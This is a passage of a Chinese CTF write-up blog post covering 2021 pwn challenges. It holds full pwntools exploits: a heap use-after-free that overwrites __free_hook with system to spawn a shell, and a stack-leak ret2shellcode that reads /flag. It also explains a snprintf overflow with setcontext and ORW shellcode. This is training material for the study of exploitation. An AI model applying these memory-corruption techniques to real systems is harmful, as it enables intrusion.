class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.terminal = [<span class="string">"tmux"</span>, <span class="string">"new-window"</span>]</span><br><span class="line"><span class="comment">#context.log_level = True</span></span><br><span class="line"></span><br><span class="line">is_remote = <span class="literal">False</span></span><br><span class="line">remote_addr = [<span class="string">''</span>,<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">elf_path = <span class="string">"./sharing"</span></span><br><span class="line">libc_path = <span class="string">"/lib/x86_64-linux-gnu/libc-2.27.so"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> is_remote:</span><br><span class="line">    p = remote(remote_addr[<span class="number">0</span>], remote_addr[<span class="number">1</span>])</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = process(elf_path, aslr = <span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> elf_path:</span><br><span class="line">    elf = ELF(elf_path)</span><br><span class="line"><span class="keyword">if</span> libc_path:</span><br><span class="line">    libc = ELF(libc_path)</span><br><span class="line"></span><br><span class="line">ru = <span class="keyword">lambda</span> x : p.recvuntil(x)</span><br><span class="line">sn = <span class="keyword">lambda</span> x : p.send(x)</span><br><span class="line">rl = <span class="keyword">lambda</span>   : p.recvline()</span><br><span class="line">sl = <span class="keyword">lambda</span> x : p.sendline(x)</span><br><span class="line">rv = <span class="keyword">lambda</span> x : p.recv(x)</span><br><span class="line">sa = <span class="keyword">lambda</span> a,b : p.sendafter(a,b)</span><br><span class="line">sla = <span class="keyword">lambda</span> a,b : p.sendlineafter(a,b)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">lg</span><span class="params">(s, addr = None)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> addr != <span class="literal">None</span>:</span><br><span class="line">        print(<span class="string">'\033[1;31;40m[+]  %-15s  --&gt; 0x%8x\033[0m'</span>%(s,addr))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">'\033[1;32;40m[-]  %-20s \033[0m'</span>%(s))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">raddr</span><span class="params">(a = <span class="number">6</span>)</span>:</span></span><br><span class="line">    <span class="keyword">if</span>(a == <span class="number">6</span>):</span><br><span class="line">        <span class="keyword">return</span> u64(rv(a).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> u64(rl().strip(<span class="string">'\n'</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">choice</span><span class="params">(i)</span>:</span></span><br><span class="line">    sla(<span class="string">": "</span>, str(i))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(idx, siz)</span>:</span></span><br><span class="line">    choice(<span class="number">1</span>)</span><br><span class="line">    choice(idx)</span><br><span class="line">    choice(siz)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(idx)</span>:</span></span><br><span class="line">    choice(<span class="number">3</span>)</span><br><span class="line">    choice(idx)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(idx, content)</span>:</span></span><br><span class="line">    choice(<span class="number">4</span>)</span><br><span class="line">    choice(idx)</span><br><span class="line">    sa(<span class="string">"Content: "</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dup</span><span class="params">(source, dst)</span>:</span></span><br><span class="line">    choice(<span class="number">2</span>)</span><br><span class="line">    choice(source)</span><br><span class="line">    choice(dst)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">20</span>):</span><br><span class="line">        add(i, <span class="number">0x100</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">20</span>):</span><br><span class="line">        dup(<span class="number">21</span>, i)</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x500</span>)</span><br><span class="line">    show(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    rv(<span class="number">8</span> * <span class="number">3</span>)</span><br><span class="line">    heap_addr = u64(rv(<span class="number">8</span>)) - <span class="number">0x160</span></span><br><span class="line">    lg(<span class="string">"Heap"</span>, heap_addr)</span><br><span class="line">    rv(<span class="number">8</span> * <span class="number">2</span>)</span><br><span class="line">    libc_addr = u64(rv(<span class="number">8</span>)) - <span class="number">0x3ebca0</span></span><br><span class="line">    lg(<span class="string">"libc"</span>, libc_addr)</span><br><span class="line">    libc.address = libc_addr</span><br><span class="line">    ru(<span class="string">"Choice"</span>)</span><br><span class="line">    dup(<span class="number">21</span>, i)</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x100</span>)</span><br><span class="line">    add(<span class="number">1</span>, <span class="number">0x100</span>)</span><br><span class="line">    edit(<span class="number">0</span>, <span class="string">"/bin/sh\x00"</span>)</span><br><span class="line">    edit(<span class="number">1</span>, <span class="string">"fuckyou"</span>)</span><br><span class="line">    choice(<span class="number">0xdead</span>)</span><br><span class="line">    choice(<span class="string">"C++isreallyCool!"</span>)</span><br><span class="line">    choice(heap_addr)</span><br><span class="line">    show(<span class="number">1</span>)</span><br><span class="line">    content = rv(<span class="number">0x128</span>)</span><br><span class="line">    edit(<span class="number">1</span>, content + p64(libc.symbols[<span class="string">'__free_hook'</span>]))</span><br><span class="line">    edit(<span class="number">1</span>, p64(libc.symbols[<span class="string">'system'</span>]))</span><br><span class="line">    dup(<span class="number">21</span>, <span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure>
<p>chunk块的free条件是chunk的引用计数为0</p>
<p>首先泄露libc有两种方法，第一种如下</p>
<p>先申请0x480绕过tcache，然后add0覆盖掉这个480，让其落入unsortedbin，这里经过测试是每次chunk的申请会清零堆，但是content的申请不会清零，这里是add1 add2刚好让2的content落入上一次的unsortedbin的残留数据里，使其泄露libc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>,<span class="number">0x480</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x10</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line">addr=u64(ru(<span class="string">"\x7f"</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">"\x00"</span>))</span><br><span class="line">leak(<span class="string">"addr"</span>,addr)</span><br><span class="line">libc_base=addr<span class="number">-0x3ebca0</span></span><br><span class="line">leak(<span class="string">"libc_base"</span>,libc_base)</span><br></pre></td></tr></table></figure>
<p>第二种就是像wp里那样</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119223115335.png" alt="image-20220119223115335"></p>
<p>他这个是进行大量的add free操作，在堆上残留信息，然后直接申请一个大块，让content落上面，exp里后面为什么-160，是因为后面再次分配的堆块就在-160的地方</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119223147671.png" alt="image-20220119223147671"></p>
<p>最后的利用是，先用后门改size，size原来是0x100   然后00-2就变成了fe导致size变成了0x1fe,就产生了overflow，之后0x128是刚好对齐到content的地址处，第一次修改把其content指针改成free_hook的值，第二次修改时就操作content把free_hook改为system，最后只要free掉0就行了</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119222422752.png" alt="image-20220119222422752"></p>
<p>C++的题目很多漏洞就是发生在垂悬指针上导致的UAF</p>
<h2 id="ByteCTF2021"><a href="#ByteCTF2021" class="headerlink" title="ByteCTF2021"></a>ByteCTF2021</h2><h2 id="DASCTF-Sept-X-浙江工业大学秋季挑战赛"><a href="#DASCTF-Sept-X-浙江工业大学秋季挑战赛" class="headerlink" title="DASCTF-Sept-X-浙江工业大学秋季挑战赛"></a>DASCTF-Sept-X-浙江工业大学秋季挑战赛</h2><h3 id="hehepwn"><a href="#hehepwn" class="headerlink" title="hehepwn"></a>hehepwn</h3><p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120102146629.png" alt="image-20220120102146629"></p>
<p>主函数</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120102214172.png" alt="image-20220120102214172"></p>
<p>scanf直接向栈上写入值，明显栈溢出</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120102236733.png" alt="image-20220120102236733"></p>
<p>这里read到s一个字符串，然后strdup是复制字符串</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120102746536.png" alt="image-20220120102746536"></p>
<p>这题当时做的时候搜到了类似的原题</p>
<p><a href="https://github.com/VulnHub/ctf-writeups/blob/master/2014/advent-ctf/oh-my-scanf.md" target="_blank" rel="noopener">ctf-writeups/oh-my-scanf.md at master · VulnHub/ctf-writeups (github.com)</a></p>
<p>本来想着照着原题的方法去做的，直接打栈上ROP，后来突然发现原题是32位的程序，只要栈上布局参数就行了，我这是64位程序，得考虑把参数送到寄存器里面</p>
<p>然后就想到64位下可以用ret2csu来调整栈布局</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120103328574.png" alt="image-20220120103328574"></p>
<p>这里允许我们得跳两次这个函数，第一次跳到61A把寄存器布局一下，第二次跳到600执行函数，因为这里的二进制编码都太是scanf可以接受的，</p>
<p><a href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/16/input/" target="_blank" rel="noopener">CTF中常见的C语言输入函数截断属性总结 | Clang裁缝店 (xuanxuanblingbling.github.io)</a></p>
<p>本来这样ret2csu应该就出了，恰好09给截断了</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120103447041.png" alt="image-20220120103447041"></p>
<p>所以得考虑下栈迁移</p>
<p><a href="https://cloud.tencent.com/developer/article/1601192" target="_blank" rel="noopener">PWN！栈迁移原理 - 云+社区 - 腾讯云 (tencent.com)</a></p>
<p>前面有read 然后用strdup把内容拷贝到堆中，所以我们可以自己输入一块shellcode在堆里面然后再跳过去执行</p>
<p>实际上栈迁移就是执行两次mov rsp,rbp pop rbp, retn ;;;mov rsp,rbp pop rbp, retn</p>
<p>第一次是让rbp到我们指定的地址，第二次是把rsp移到我们指定的地址</p>
<p>栈迁移这样分析来看是应用于本身栈溢出可能不够用的情况，如果栈溢出够用就可以不用栈迁移，或者说某些地址值会被scanf截断的时候也考虑栈迁移，但是这题连跳到堆上都会被截断</p>
<p>但是这题很蛋疼，堆上的地址0x20也会被截断</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120104202432.png" alt="image-20220120104202432"></p>
<p>和别人交流下之后，知道可以多此执行main函数来调整堆，可能能绕过这一截断</p>
<p>但是最后调试时才发现这题的考点，strdup copy字符串过去之后会泄露栈地址，只要我们read填满0x20字节，后面printf就可以打印栈地址，</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120104343361.png" alt="image-20220120104343361"></p>
<p>所以利用思路为直接read shellcode到栈上，然后通过printf获取栈上shellcode的地址，最后通过scanf栈溢出覆盖返回地址执行shellcode</p>
<p>拷贝下别人的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwncli <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">cli_script()</span><br><span class="line"></span><br><span class="line">p:tube = gift[<span class="string">'io'</span>]</span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">"well you input:\n"</span>, <span class="string">"a"</span>*<span class="number">0x20</span>)</span><br><span class="line">m = p.recvuntil(<span class="string">"\x7f"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># leak stack addr</span></span><br><span class="line">addr = u64_ex(m[<span class="number">-6</span>:])</span><br><span class="line">log_address(<span class="string">"stack addr"</span>, addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ret2shellcode</span></span><br><span class="line">p.sendlineafter(<span class="string">"EASY PWN PWN PWN~\n"</span>, flat(&#123;<span class="number">0</span>:asm(shellcraft.cat(<span class="string">'/flag'</span>)), <span class="number">0x58</span>: addr - <span class="number">0x50</span>&#125;))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="datasystem"><a href="#datasystem" class="headerlink" title="datasystem"></a>datasystem</h3><p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112000595.png" alt="image-20220120112000595"></p>
<p>main函数这里首先一个判断sub_2170,如果为真就进入到sub_2D40</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112122465.png" alt="image-20220120112122465"></p>
<p>函数2D40进来就是菜单堆题，所以我们得首先想办法过掉第一个判断函数</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112139312.png" alt="image-20220120112139312"></p>
<p>sub_2170中进来就是让输入username和password，那估计就是类似于登录功能了</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112249173.png" alt="image-20220120112249173"></p>
<p>中间一堆算法，最后可以看到对比用户名和密码的地方</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112415392.png" alt="image-20220120112415392"></p>
<p>最终要比较的是个md5值<img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112426960.png" alt="image-20220120112426960"></p>
<p>而且这很明显的看到md5的常量</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112439119.png" alt="image-20220120112439119"></p>
<p>这里就直接用exp里给的账号和密码来调</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112518064.png" alt="image-20220120112518064"></p>
<p>接着分析堆的部分</p>
<p>add里面用了Snprintf，这里漏洞也比较隐蔽，存在在snprintf里面，其实很早就有相关的文章了</p>
<p><a href="https://www.cnblogs.com/studyskill/articles/6699552.html" target="_blank" rel="noopener">转：实战栈溢出：三个漏洞搞定一台路由器（长亭科技） - studyskill - 博客园 (cnblogs.com)</a></p>
<p>delete这里没清空数据区，可以直接泄露libc</p>
<p>用snprintf的洞造成溢出，随便打，但是由于程序开了沙箱，所以得考虑ORW</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112754577.png" alt="image-20220120112754577"></p>
<p>由于这是低版本，直接setcontex 布局寄存器还是很简单的，</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112827195.png" alt="image-20220120112827195"></p>
<p>exp构造</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220120112844370.png" alt="image-20220120112844370"></p>
<p>这里a8给rcx  实际上就是setcontext之后要执行的地方，因为上面push rcx了</p>
<p>传的参数是rdi = 0 rsi=0x233330000 rdx = 0x200,也就是下面执行read，把shellcode放到0x23330000处，上面a0是栈迁移把rsp移到了 ___free_hook -0x100</p>
<p>因为本来这个payload就是写到free_hook-0x200上面的，所以0x100填成0x2333000，待会read执行完就直接跳到这里执行了</p>
<p>0x200纯粹就是覆盖掉free_hook，这样free_hook就会来执行setcontext+53,然后setcontext执行read往0x23330000读入shellcode</p>
<p>最后再次retn的时候retn到free_hook-0x100里面的值，也就是0x23330000</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/01/18/Christomas/Christomas/" rel="next" title>
                <i class="fa fa-chevron-left"></i> 
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2022/01/20/libc_summary/libc_summary/" rel="prev" title>
                 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.jpg" alt="zzrR0">
            
              <p class="site-author-name" itemprop="name">zzrR0</p>
              <p class="site-description motion-element" itemprop="description">Why am i so cai.</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://xmzyshypnc.github.io/" title="xmzyshypnc" target="_blank">xmzyshypnc</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wood1314.github.io/" title="Wood" target="_blank">Wood</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.zeddyu.info/" title="Zedd" target="_blank">Zedd</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2021CTFWP"><span class="nav-number">1.</span> <span class="nav-text">2021CTFWP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#MUSL"><span class="nav-number">1.1.</span> <span class="nav-text">MUSL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mips"><span class="nav-number">1.2.</span> <span class="nav-text">mips</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#HWS入营赛题-MpLogin"><span class="nav-number">1.2.1.</span> <span class="nav-text">HWS入营赛题 MpLogin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#refs"><span class="nav-number">1.2.2.</span> <span class="nav-text">refs</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TCTF2021"><span class="nav-number">1.3.</span> <span class="nav-text">TCTF2021</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#uc-masteeer"><span class="nav-number">1.3.1.</span> <span class="nav-text">uc_masteeer</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#listbook"><span class="nav-number">1.3.2.</span> <span class="nav-text">listbook</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Refs"><span class="nav-number">1.3.3.</span> <span class="nav-text">Refs</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RCTF2021"><span class="nav-number">1.4.</span> <span class="nav-text">RCTF2021</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sharing"><span class="nav-number">1.4.1.</span> <span class="nav-text">sharing</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ByteCTF2021"><span class="nav-number">1.5.</span> <span class="nav-text">ByteCTF2021</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DASCTF-Sept-X-浙江工业大学秋季挑战赛"><span class="nav-number">1.6.</span> <span class="nav-text">DASCTF-Sept-X-浙江工业大学秋季挑战赛</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#hehepwn"><span class="nav-number">1.6.1.</span> <span class="nav-text">hehepwn</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#datasystem"><span class="nav-number">1.6.2.</span> <span class="nav-text">datasystem</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zzrR0</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.3.0</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  

  
    <script id="dsq-count-scr" src="https://xmzyshypnc.disqus.com/count.js" async></script>
  

  
    <script type="text/javascript">
      var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/';
        this.page.identifier = '2022/01/19/2021CTFWP/2021CTFWP/';
        this.page.title = '';
        };
      function loadComments () {
        var d = document, s = d.createElement('script');
        s.src = 'https://xmzyshypnc.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      }
      
        loadComments();
      
    </script>
  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: true,
        appId: 'YbpHIa6XHNsKv4wX2wGjnrK7-gzGzoHsz',
        appKey: '1fjf9mQl90nKdRPfq1zhDyIE',
        placeholder: '',
        avatar:'mm',
        meta:guest,
        pageSize:'10' || 10,
        visitor: true
    });
  </script>



  





  

  

  

  

  
  

  

  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"live2d-widget-model-hijiki"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":0,"vOffset":-50},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"tagMode":false});</script></body>
</html>
